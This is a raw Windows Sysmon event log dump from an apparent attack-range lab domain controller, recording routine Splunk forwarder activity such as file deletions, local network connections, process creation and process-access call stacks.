AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFE9DF37BF89A5AF1A4B722088208D6F,SHA256=DE940DD51739BC41CEF2410185E3F482017B67B5BE7735FA1D224392BCB8716F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:35.839{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADC03BEA9F0388DAEF254674FB6CC8C2,SHA256=5E59D2C544A4160836867300114D67923A0B2AAEDC3B2136C642A76871226FC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:35.448{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=009026C42614F42CA061318E47817255,SHA256=7C49BAED127A212F18F9E380DBC3090A7C4F03089163EBF1EE063E1A83D3B861,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:36.479{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E027D1810A1B4EE6F232E315018E9644,SHA256=8006388346C76A732BBCDF244A2BE895A29EF42C1C4C578C962C4151D7C45500,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:34.206{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61472-false10.0.1.12-8000- 23542300x800000000000000024066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:37.495{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B68A12FB8FA255D9D4C90D396DCD7022,SHA256=82B0CF6B390C9ED71B3027BD4DDE3A9C9A3B562EAAA918709F5BE5A3B99A606B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:38.511{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69DF458C0F878F7EA00ACDA71946785E,SHA256=F1551EF3BBE44E0103B31FAA9AA25CC3980738DAE2F2277575635944E13BF4D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:39.526{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=505F74DA69C47792849486EDC3CC243B,SHA256=CB2A5FC35AD180003C19A557139E02DAAB62894520DDB2DFC1BF7FED0E12E829,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:39.167{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:39.221{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61474-false10.0.1.12-8000- 354300x800000000000000024071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:39.206{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61473-false10.0.1.12-8089- 23542300x800000000000000024070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:40.530{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF41F7E91F010C3B07DD6A4411384A80,SHA256=49FB73C4036CF8AF21946E3A464C27D7843A66E254FFF5FDA1FD25C8601D055B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:41.543{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF780B2A4A32AC855259974750671288,SHA256=6C4144E7EA60FC31A3BE87496DAC05D6C08FF68F2F130F0AF26EDEB6CC5BA5CB,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000024074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:42.559{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB3263D5FB852157D5E652147ABB8355,SHA256=F8C9C765A126C348869D5A746756DFC8A815E1946BB0BD01ADB0FC6A0CE0D99C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:43.559{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F9DAD7FC040D643819692B1768A0003,SHA256=C436D64F0933919E0208FA479511EF870E7917EC31B212644C2758503988A54B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:44.637{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=592F87529BA4A4B4B6B0BB0E84EB1AA5,SHA256=70563060B293180AC45E325E4BCA09089919FBFEABC807253D7FEDB2BA254558,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:44.223{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61475-false10.0.1.12-8000- 
23542300x800000000000000024077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:45.668{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937739ABDFC3D440B43641DD2459B9B8,SHA256=4A54C1AEDC812DED7BE1E366CF4652553D4D5E23B9F2A410B26E60BDEA2993FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:46.668{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937048A9799133F9830998D206EA41A5,SHA256=C9899124DF5E7A8BB035A63E8AC63767CC3C7604F035605193D10BA627B1C938,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:47.684{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=703D0A4377C8FD6DB454421DD27A585F,SHA256=0E65C969173EB8C58D82889F9C109D5EDBC929A44B600030C4B03A05240FF8CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:48.699{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BD2D8EA77BF2600221AA719489448A5,SHA256=5AAECFDDB25082DE75F432452B982EF178026D4D712A00AE84F6809EB67A8514,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:49.715{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C5EEA6FA2DB458882500C515B2EDB5D,SHA256=CAEDAFE92D8D49BEEAB75C430C1D7DE0D4A94197082D4823886E8322A501AC30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:50.741{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A26F584578068AA4D4BA3702FC3F5C,SHA256=BD294E19252A22AD089980F04649F8E3351121E882D94A0E83DB6EC66ED4753E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:51.741{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AD3E33D8D698292885E33FEC5B7FD81,SHA256=FBF2AF790601044C6C1AD91F9942E43474B3847B406371A257D38BF0B61362E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:49.301{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61476-false10.0.1.12-8000- 23542300x800000000000000024086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:52.772{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E30FAC9CA45B4C79C5E4C447BAE57DE,SHA256=28792841DEF4192CBC68B84D4073A0C813CB7B94B4EF34213805E89BCFA38FE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.788{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C27F51981053778772FEBA3076589D59,SHA256=B32267E30AF31DF47149BEAD44F3289545E76A442D3CF78AA20723B83FCD78E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.585{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EAA6A38F4200627AE0CD9678794235B,SHA256=B56422D4289AC07FFEACCC0122A29D69BB38C7AAF936B6DE2A9A612FB0F14170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.585{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFE9DF37BF89A5AF1A4B722088208D6F,SHA256=DE940DD51739BC41CEF2410185E3F482017B67B5BE7735FA1D224392BCB8716F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2A9-60D3-1706-00000000CF01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:53.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:53.147{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2A9-60D3-1706-00000000CF01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2A9-60D3-1706-00000000CF01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.008{4DB9351A-A2A9-60D3-1706-00000000CF01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024118Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.944{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EAA6A38F4200627AE0CD9678794235B,SHA256=B56422D4289AC07FFEACCC0122A29D69BB38C7AAF936B6DE2A9A612FB0F14170,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000024117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2AA-60D3-1906-00000000CF01}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:54.913{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
